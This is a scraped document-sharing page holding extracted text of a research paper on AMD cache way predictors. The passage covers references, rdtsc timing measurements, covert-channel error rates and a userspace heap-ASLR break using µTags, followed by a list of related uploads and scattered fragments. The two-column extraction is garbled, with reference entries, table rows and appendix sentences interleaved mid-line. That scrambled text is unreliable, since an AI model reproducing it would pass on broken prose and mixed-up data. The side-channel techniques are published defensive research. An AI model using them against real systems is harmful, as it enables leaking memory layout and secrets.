performance, portable implementation of the MPI message passing interface termeasures: the Case of AES. In CT-RSA.
standard. Parallel computing (1996). [59] Colin Percival. 2005. Cache missing for fun and profit. In BSDCan.
[27] Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, [60] Peter Pessl, Daniel Gruss, Clémentine Maurice, Michael Schwarz, and Stefan
and Stefan Mangard. 2017. KASLR is Dead: Long Live KASLR. In ESSoS. Mangard. 2016. DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.
[28] Daniel Gruss, Clémentine Maurice, Anders Fogh, Moritz Lipp, and Stefan Man- In USENIX Security Symposium.
gard. 2016. Prefetch Side-Channel Attacks: Bypassing SMAP and Kernel ASLR. [61] Moinuddin K Qureshi. 2019. New attacks and defense for encrypted-address
In CCS. cache. In ISCA.
[29] Daniel Gruss, Clémentine Maurice, and Stefan Mangard. 2016. Rowhammer.js: A [62] Chester Rebeiro, A. David Selvakumar, and A. S. L. Devi. 2006. Bitslice Imple-
Remote Software-Induced Fault Attack in JavaScript. In DIMVA. mentation of AES. In Cryptology and Network Security (CANS).
[30] Daniel Gruss, Clémentine Maurice, Klaus Wagner, and Stefan Mangard. 2016. [63] Thomas Ristenpart, Eran Tromer, Hovav Shacham, and Stefan Savage. 2009.
Flush+Flush: A Fast and Stealthy Cache Attack. In DIMVA. Hey, You, Get Off of My Cloud: Exploring Information Leakage in Third-Party
[31] Daniel Gruss, Raphael Spreitzer, and Stefan Mangard. 2015. Cache Template Compute Clouds. In CCS.
Attacks: Automating Attacks on Inclusive Last-Level Caches. In USENIX Security [64] David J Sager and Glenn J Hinton. 2002. Way-predicting cache memory. US
Symposium. Patent 6,425,055.
[32] Shay Gueron. 2012. Intel Advanced Encryption Standard (Intel AES) Instructions [65] Michael Schwarz, Claudio Canella, Lukas Giner, and Daniel Gruss. 2019. Store-to-
Set – Rev 3.01. Leak Forwarding: Leaking Data on Meltdown-resistant CPUs. arXiv:1905.05725
[33] Richard W Hamming. 1950. Error detecting and error correcting codes. The Bell (2019).
system technical journal (1950). [66] Michael Schwarz, Daniel Gruss, Samuel Weiser, Clémentine Maurice, and Stefan
[34] Joel Hruska. 2019. AMD Gains Market Share in Desktop and Laptop, Slips in Mangard. 2017. Malware Guard Extension: Using SGX to Conceal Cache Attacks.
Servers. https://www.extremetech.com/computing/291032-amd In DIMVA.
[35] Ralf Hund, Carsten Willems, and Thorsten Holz. 2013. Practical Timing Side [67] Michael Schwarz, Moritz Lipp, Daniel Gruss, Samuel Weiser, Clémentine Maurice,
Channel Attacks against Kernel Space ASLR. In S&P. Raphael Spreitzer, and Stefan Mangard. 2018. KeyDrown: Eliminating Software-
[36] Koji Inoue, Tohru Ishihara, and Kazuaki Murakami. 1999. Way-predicting set- Based Keystroke Timing Side-Channel Attacks. In NDSS.
associative cache for high performance and low energy consumption. In Sympo- [68] Michael Schwarz, Moritz Lipp, Daniel Moghimi, Jo Van Bulck, Julian Steck-
sium on Low Power Electronics and Design. lina, Thomas Prescher, and Daniel Gruss. 2019. ZombieLoad: Cross-Privilege-
[37] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. 2015. S$A: A Shared Cache Boundary Data Sampling. In CCS.
Attack that Works Across Cores and Defies VM Sandboxing – and its Application [69] Michael Schwarz, Clémentine Maurice, Daniel Gruss, and Stefan Mangard. 2017.
to AES. In S&P. Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural
[38] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. 2016. Cross processor cache Attacks in JavaScript. In FC.
attacks. In AsiaCCS. [70] Michael Schwarz, Martin Schwarzl, Moritz Lipp, and Daniel Gruss. 2019. Net-
[39] Yeongjin Jang, Sangho Lee, and Taesoo Kim. 2016. Breaking Kernel Address Spectre: Read Arbitrary Memory over Network. In ESORICS.
Space Layout Randomization with Intel TSX. In CCS.
Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan

Table 3: rdtsc increments on various CPUs. 3

Error Rate [%]

2
Setup CPU µ-arch. Increment 1 AMD Threadripper Ryzen 1920X
Lab AMD Athlon 64 X2 3800+ K8 1 AMD EPYC 7751
0
Lab AMD Turion II Neo N40L K10 1
0 20 40 60 80
Lab AMD Phenom II X6 1055T K10 1
Lab AMD E-450 Bobcat 1 Number of Channels
Lab AMD Athlon 5350 Jaguar 1
Lab AMD FX-4100 Bulldozer 1 Figure 6: Error rate of the covert channel.
Lab AMD FX-8350 Piledriver 1
Lab AMD A10-7870K Steamroller 1
3
Lab AMD Ryzen Threadripper 1920X Zen 35 No Error Correction Hamming(7,4)

Error Rate [%]

Lab AMD Ryzen Threadripper 1950X Zen 34 2 Hamming(15,11)
Lab AMD Ryzen Threadripper 1700X Zen 34
Lab AMD Ryzen Threadripper 2970WX Zen+ 30 1
Lab AMD Ryzen 7 3700X Zen 2 36 0
Cloud AMD EPYC 7401p Zen 20 0 20 40 60 80
Cloud AMD EPYC 7571 Zen 22
Number of Channels

Figure 7: Error rate of the covert channel with and without

[71] Mark Seaborn. 2015. How physical addresses map to rows and banks in
DRAM. http://lackingrhoticity.blogspot.com/2015/05/how-physical-addresses- error correction using different Hamming codes.
map-to-rows-and-banks.html
[72] Raphael Spreitzer and Thomas Plos. 2013. Cache-Access Pattern Attack on
Disaligned AES T-Tables. In COSADE. B COVERT CHANNEL ERROR RATE
[73] Junko Takahashi, Toshinori Fukunaga, Kazumaro Aoki, and Hitoshi Fuji. 2013.
Highly accurate key extraction method for access-driven cache attacks using Figure 6 illustrates the error rate of the covert channel described
correlation coefficient. In ACISP. in Section 5.1. The error rate increases drastically when transmitting
[74] Jo Van Bulck, Marina Minkin, Ofir Weisse, Daniel Genkin, Baris Kasikci, Frank
Piessens, Mark Silberstein, Thomas F. Wenisch, Yuval Yarom, and Raoul Strackx. more than 64 bits in parallel. Thus, we evaluated different hamming
2018. Foreshadow: Extracting the Keys to the Intel SGX Kingdom with Transient codes on an AMD Ryzen Threadripper 1920X (Figure 7).
Out-of-Order Execution. In USENIX Security Symposium.
[75] Stephan van Schaik, Alyssa Milburn, Sebastian Österlund, Pietro Frigo, Giorgi
Maisuradze, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. 2019. RIDL: C USERSPACE ASLR
Rogue In-flight Data Load. In S&P.
[76] VMWare. 2018. Security considerations and disallowing inter-Virtual Machine
Linux also uses ASLR for user processes by default. However, ran-
Transparent Page Sharing (2080735). https://kb.vmware.com/s/article/2080735 domizing the code section requires compiler support for position-
[77] Mario Werner, Thomas Unterluggauer, Lukas Giner, Michael Schwarz, Daniel independent code. The heap memory region is of particular interest
Gruss, and Stefan Mangard. 2019. ScatterCache: Thwarting Cache Attacks via
Cache Set Randomization. In USENIX Security Symposium. because it is located just after the code section with an offset of up
[78] Felix Wilhelm. 2016. PoC for breaking hypervisor ASLR using branch target to 32 MB [47]. User programs use 4 kB pages, giving an effective
buffer collisions. https://github.com/felixwilhelm/mario_baslr 13-bit entropy for the start of the brk-based heap memory.
[79] Henry Wong. 2013. Intel Ivy Bridge Cache Replacement Policy. http://blog.
stuffedcow.net/2013/01/ivb-cache-replacement/ It is possible to fully break heap ASLR through the use of µTags.
[80] John C Wray. 1992. An analysis of covert timing channels. Journal of Computer An attack requires an interface to the victim application that incurs
Security 1, 3-4 (1992), 219–232.
[81] Mengjia Yan, Read Sprabery, Bhargava Gopireddy, Christopher Fletcher, Roy
a victim access to data on the heap. We evaluated the ASLR break
Campbell, and Josep Torrellas. 2019. Attack directories, not caches: Side channel using a client-server scenario in a toy application, where the at-
attacks in a non-inclusive world. In S&P. tacker is the malicious client. The attacker repeatedly sends benign
[82] Yuval Yarom and Katrina Falkner. 2014. Flush+Reload: a High Resolution, Low
Noise, L3 Cache Side-Channel Attack. In USENIX Security Symposium. requests until it is distinguishable which tag is being accessed by
[83] Xiaokuan Zhang, Yuan Xiao, and Yinqian Zhang. 2016. Return-oriented flush- the victim. This already reduces the ASLR entropy by 8 bits because
reload side channels on arm and their implications for android devices. In CCS. it reveals a linear combination of the address bits. It is also possible
[84] Yinqian Zhang, Ari Juels, Michael K. Reiter, and Thomas Ristenpart. 2012. Cross-
VM Side Channels and Their Use to Extract Private Keys. In CCS. to recover all address bits up to bit 27 by using the µTags of multiple
[85] Yinqian Zhang, Ari Juels, Michael K. Reiter, and Thomas Ristenpart. 2014. Cross- pages and solving the resulting equation system.
Tenant Side-Channel Attacks in PaaS Clouds. In CCS.
Again, a limitation is that the attack is susceptible to noise. Too
many accesses while processing the attacker’s request negatively
A RDTSC RESOLUTION impact the measurements such that the attacker will always observe
We measure the resolution of the rdtsc instruction using the fol- a cache miss. In our experiments, we were not able to mount the
lowing experimental setup. We assume that the timestamp counter attack using a socket-based interface. Hence, attacking other user-
(TSC) is updated in a fixed interval. This assumption is based on space applications that rely on a more complex interface, e.g., using
the documentation in the manual that the timestamp counter is D-Bus, is currently not practical. However, future work may refine
independent of the CPU frequency [8]. Hence, there is a modulus our techniques to also mount attacks in more noisy scenarios. For
x and a constant C, such that TSC mod x ≡ C iff x is the TSC our evaluation, we targeted a shared-memory-based API for high-
increment. We can easily find this x with brute-force, i.e., trying speed transmission without system calls [26] provided by the victim
all different x until we find an x, which always results in the same application. We were able to recover 13 bits with an average success
value C. Table 3 shows a rdtsc increments for the CPUs we tested. rate of 88.9 % in 1.94 s (σ = 1.76 s, n = 1000).

The Cache Memory Book (Jim Handy) (Z-Library)
No ratings yet
The Cache Memory Book (Jim Handy) (Z-Library)
331 pages
Spectre May2
No ratings yet
Spectre May2
99 pages
Securing Processor Architectures
No ratings yet
Securing Processor Architectures
84 pages
CA Chap5 Memory
No ratings yet
CA Chap5 Memory
64 pages
Samira Briongos Herrero
No ratings yet
Samira Briongos Herrero
233 pages
Ucam CL TR 630
No ratings yet
Ucam CL TR 630
144 pages
Acaces2019 Proc Arch Sec Part-3
No ratings yet
Acaces2019 Proc Arch Sec Part-3
48 pages
Semi-Invasive Attacks - A New Approach To Hardware Security Analysis PDF
No ratings yet
Semi-Invasive Attacks - A New Approach To Hardware Security Analysis PDF
144 pages
Cache Memories
No ratings yet
Cache Memories
58 pages
Leaking Secrets Via Intel AMD
No ratings yet
Leaking Secrets Via Intel AMD
14 pages
Leaking Secrets Via Intel AMD Micro OP Caches Isca2021a
No ratings yet
Leaking Secrets Via Intel AMD Micro OP Caches Isca2021a
14 pages
Bochspwn Reloaded
No ratings yet
Bochspwn Reloaded
100 pages
Applespectre Dimva22
No ratings yet
Applespectre Dimva22
20 pages
Socc12 Slides
No ratings yet
Socc12 Slides
74 pages
Cache Org
No ratings yet
Cache Org
19 pages
Comparison Between Differential and Correlation Power Analysis Attacks On Embedded Systems Master Thesis
No ratings yet
Comparison Between Differential and Correlation Power Analysis Attacks On Embedded Systems Master Thesis
52 pages
A Detailed Investigation and Analysis of Using Machine Learning Techniques For Intrusion Detection
No ratings yet
A Detailed Investigation and Analysis of Using Machine Learning Techniques For Intrusion Detection
43 pages
Unit IV ARM
No ratings yet
Unit IV ARM
43 pages
CS5204/EE5364 - Advanced Computer Architecture - Memory
No ratings yet
CS5204/EE5364 - Advanced Computer Architecture - Memory
67 pages
Smack: Efficient Instruction Cache Attacks Via Self-Modifying Code Conflicts
No ratings yet
Smack: Efficient Instruction Cache Attacks Via Self-Modifying Code Conflicts
15 pages
October 2022 IT Passport Examination
No ratings yet
October 2022 IT Passport Examination
8 pages
Group Reports
No ratings yet
Group Reports
7 pages
Demoting Security Via Exploitation of Cache Demote Operation in Intel's Latest ISA Extension
No ratings yet
Demoting Security Via Exploitation of Cache Demote Operation in Intel's Latest ISA Extension
18 pages
Defeating Hardware Based RAM Acquisition
No ratings yet
Defeating Hardware Based RAM Acquisition
56 pages
DAWG: A Defense Against Cache Timing Attacks in Speculative Execution Processors
No ratings yet
DAWG: A Defense Against Cache Timing Attacks in Speculative Execution Processors
14 pages
ThoughtsonPersistence Neel Mehta Baythreat2011
No ratings yet
ThoughtsonPersistence Neel Mehta Baythreat2011
53 pages
Final Report 1
No ratings yet
Final Report 1
45 pages
ACA Final Project Presentation
No ratings yet
ACA Final Project Presentation
43 pages
Cursul 6d EN SAS
No ratings yet
Cursul 6d EN SAS
14 pages
Dimva15 Clementine
No ratings yet
Dimva15 Clementine
19 pages
Software Mitigations To Hedge AES Against Cache-Based Software Side Channel Vulnerabilities
No ratings yet
Software Mitigations To Hedge AES Against Cache-Based Software Side Channel Vulnerabilities
17 pages
Publi 6868
No ratings yet
Publi 6868
57 pages
The Acquisition and Analysis of Random Access Memory: Pre-Publication
No ratings yet
The Acquisition and Analysis of Random Access Memory: Pre-Publication
11 pages
PHD Description
No ratings yet
PHD Description
4 pages
3-IJCI Vol. 3 No. 5-May 2024-Paper2-Dr. Abdullah
No ratings yet
3-IJCI Vol. 3 No. 5-May 2024-Paper2-Dr. Abdullah
29 pages
Module4 CAche Performance
No ratings yet
Module4 CAche Performance
40 pages
Software Techniques For Managing Speculation
No ratings yet
Software Techniques For Managing Speculation
9 pages
Fine Grain Cross-Vm Attacks On Xen and Vmware Are Possible!
No ratings yet
Fine Grain Cross-Vm Attacks On Xen and Vmware Are Possible!
12 pages
Conf Micro 2006
No ratings yet
Conf Micro 2006
26 pages
Spectre Attack Lab
No ratings yet
Spectre Attack Lab
13 pages
Microsoft Defender For Endpoint Overview
No ratings yet
Microsoft Defender For Endpoint Overview
82 pages
10 Caches
No ratings yet
10 Caches
34 pages
Week 11
No ratings yet
Week 11
45 pages
Implementing Microsoft Windows Server 2022 Using HPE ProLiant Servers, Storage, and Networking Options-A50003760enw
No ratings yet
Implementing Microsoft Windows Server 2022 Using HPE ProLiant Servers, Storage, and Networking Options-A50003760enw
18 pages
Attacking The Windows Kernel
No ratings yet
Attacking The Windows Kernel
36 pages
The Maya Cache A Storage-Efficient and Secure Fully-Associative Last-Level Cache
No ratings yet
The Maya Cache A Storage-Efficient and Secure Fully-Associative Last-Level Cache
13 pages
Ass 3 Cyberfor
No ratings yet
Ass 3 Cyberfor
21 pages
Kernelsnitch Lukas Maar
No ratings yet
Kernelsnitch Lukas Maar
20 pages
Chapter 6: Memory: - CPU Accesses Memory at Least Once Per Fetch-Execute Cycle: - Memory Is Organized Into A Hierarchy
No ratings yet
Chapter 6: Memory: - CPU Accesses Memory at Least Once Per Fetch-Execute Cycle: - Memory Is Organized Into A Hierarchy
25 pages
65 DD 8 Ec 957 Ed 6
No ratings yet
65 DD 8 Ec 957 Ed 6
9 pages
Spectre PDF
No ratings yet
Spectre PDF
16 pages
Microprocessors and Security. Summary
No ratings yet
Microprocessors and Security. Summary
1 page
Meltdown Attack
No ratings yet
Meltdown Attack
15 pages
Advances in Microprocessor Cache Architectures Over The Last 25 Years
No ratings yet
Advances in Microprocessor Cache Architectures Over The Last 25 Years
11 pages
A Survey of Trusted Execution Environment Security PDF
No ratings yet
A Survey of Trusted Execution Environment Security PDF
2 pages
Cache Memory
No ratings yet
Cache Memory
20 pages
Cache and Caching: Electrical and Electronic Engineering
No ratings yet
Cache and Caching: Electrical and Electronic Engineering
15 pages
5 - Power Tweaks
100% (1)
5 - Power Tweaks
9 pages
!EXM Free Tweaking Utility V9.3
No ratings yet
!EXM Free Tweaking Utility V9.3
225 pages
WebUser #454 2018 07 25
No ratings yet
WebUser #454 2018 07 25
76 pages
Automatic Reflection and Transmission Spectrophotometer: Edition E7
No ratings yet
Automatic Reflection and Transmission Spectrophotometer: Edition E7
26 pages
APC Computer Magazine Issue 452 March 2018
No ratings yet
APC Computer Magazine Issue 452 March 2018
116 pages
Cache AN3544
No ratings yet
Cache AN3544
12 pages
Implementing Microsoft Windows Server 2022 Using HPE ProLiant Servers, Storage, and Networking Options-A50003760enw
No ratings yet
Implementing Microsoft Windows Server 2022 Using HPE ProLiant Servers, Storage, and Networking Options-A50003760enw
18 pages
Gen9SPP2021 10 0ComponentNotes
No ratings yet
Gen9SPP2021 10 0ComponentNotes
578 pages
Chapter 8. System Mechanisms - Windows Internals, Part 2, 7th Edition
No ratings yet
Chapter 8. System Mechanisms - Windows Internals, Part 2, 7th Edition
239 pages
Usb
No ratings yet
Usb
29 pages
Fosdem 2018
No ratings yet
Fosdem 2018
184 pages
PC World - March 2018 USA
No ratings yet
PC World - March 2018 USA
116 pages
19 Chandana Ys 4ad20ec012 Hardware Security PDF
No ratings yet
19 Chandana Ys 4ad20ec012 Hardware Security PDF
37 pages
Crash 2
No ratings yet
Crash 2
23 pages
Intel and Mobileye Autonomous Driving Solutions: Product Brief
No ratings yet
Intel and Mobileye Autonomous Driving Solutions: Product Brief
6 pages
Timesys Kernel Hardening Guide
No ratings yet
Timesys Kernel Hardening Guide
38 pages
Apuntes Lenguaje
No ratings yet
Apuntes Lenguaje
20 pages
Daniel Gruss PDF
No ratings yet
Daniel Gruss PDF
299 pages
4 24 CSCWD KSM Killer of Spectre and Meltdown Attacks
No ratings yet
4 24 CSCWD KSM Killer of Spectre and Meltdown Attacks
6 pages
The Cost of Poor Quality Software in The US 2018 Report
No ratings yet
The Cost of Poor Quality Software in The US 2018 Report
44 pages
SAP Systems On Windows Server 2019
No ratings yet
SAP Systems On Windows Server 2019
4 pages
Oxford Dic
No ratings yet
Oxford Dic
95 pages
File: /home/scoch/desktop/file Page 1 of 50
No ratings yet
File: /home/scoch/desktop/file Page 1 of 50
50 pages
Trans DC
No ratings yet
Trans DC
5 pages
Tentang Sistem
No ratings yet
Tentang Sistem
10 pages
Meltdown
No ratings yet
Meltdown
16 pages
Cpu2017 20190708 15932 PDF
No ratings yet
Cpu2017 20190708 15932 PDF
11 pages
Accelerated Computing with HIP
From Everand
Accelerated Computing with HIP
Yifan Sun
4.5/5 (2)
Cortex-M Architecture and Programming Reference: Definitive Reference for Developers and Engineers
From Everand
Cortex-M Architecture and Programming Reference: Definitive Reference for Developers and Engineers
Richard Johnson
No ratings yet
Tcpdump in Depth: Definitive Reference for Developers and Engineers
From Everand
Tcpdump in Depth: Definitive Reference for Developers and Engineers
Richard Johnson
No ratings yet
Technical Foundations of Emulation: Definitive Reference for Developers and Engineers
From Everand
Technical Foundations of Emulation: Definitive Reference for Developers and Engineers
Richard Johnson
No ratings yet

Take A Way: Exploring The Security Implications of AMD's Cache Way Predictors

Uploaded by

Take A Way: Exploring The Security Implications of AMD's Cache Way Predictors

Uploaded by

Take A Way: Exploring the Security Implications of AMD’s

Cache Way Predictors

Arthur Perais Clémentine Maurice Daniel Gruss

virtual addresses to monitor the memory accesses of a victim time- 2 BACKGROUND

We start with one set S 0 containing one random virtual address

Figure 3: The recovered hash functions use bits 12 to 27 of 4.1 Collide+Probe

be monitored. Similar to Prime+Probe [58], where the attacker 1 access(colliding_address);

600 Table 2: Evaluation of the ASLR experiments

200 Linux Kernel 9 7 98.5% thread 0.51 ms (σ = 12.12 µs)

Figure 4: Mean transmission rate of the covert channels us-

We successfully leaked a secret string using Collide+Probe as a 00 10 20 30 40 50 60 70 80 90 a0 b0 c0 d0 e0 f0

Table 3: rdtsc increments on various CPUs. 3

Error Rate [%]

Error Rate [%]

Figure 7: Error rate of the covert channel with and without

You might also like